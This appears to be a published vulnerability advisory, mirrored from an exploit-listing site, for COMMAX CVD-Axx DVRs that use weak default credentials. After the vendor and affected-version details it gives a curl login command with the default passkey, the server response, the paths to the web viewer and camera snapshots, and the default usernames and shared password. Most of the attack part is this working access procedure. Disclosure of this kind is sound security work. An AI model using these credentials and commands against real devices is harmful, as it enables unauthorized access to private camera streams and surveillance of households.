Exploit for COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure

## https://sploitus.com/exploit?id=PACKETSTORM:163853
COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure  
  
  
Vendor: COMMAX Co., Ltd.  
Prodcut web page: https://www.commax.com  
Affected version: CVD-AH04 DVR 4.4.1  
CVD-AF04 DVR 4.4.1  
CVD-AH16 DVR 5.1.4  
CVD-AF16 DVR 4.4.1  
CVD-AF08 DVR 5.1.2  
CVD-AH08 DVR 5.1.2  
  
Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer  
needs and convenience in single or multi-family homes.  
  
Desc: The web control panel uses weak set of default administrative credentials that  
can be easily guessed in remote password attacks and disclose RTSP stream.  
  
Tested on: Boa/0.94.14rc19  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5667  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php  
  
  
02.08.2021  
  
--  
  
  
Login:  
$ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234"  
HTTP/1.1 200 OK  
Date: Mon, 16 Aug 2021 01:04:52 GMT  
Server: Boa/0.94.14rc19  
Accept-Ranges: bytes  
Connection: close  
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">  
  
IE (ActiveX) web player:  
http://192.168.1.2/web_viewer2.html  
  
Snapshots:  
http://192.168.1.2/images/snapshot-01.jpg  
http://192.168.1.2/images/snapshot-02.jpg  
http://192.168.1.2/images/snapshot-nn.jpg  
  
  
Creds:  
Users: ADMIN,USER1,USER2,USER3  
Password: 1234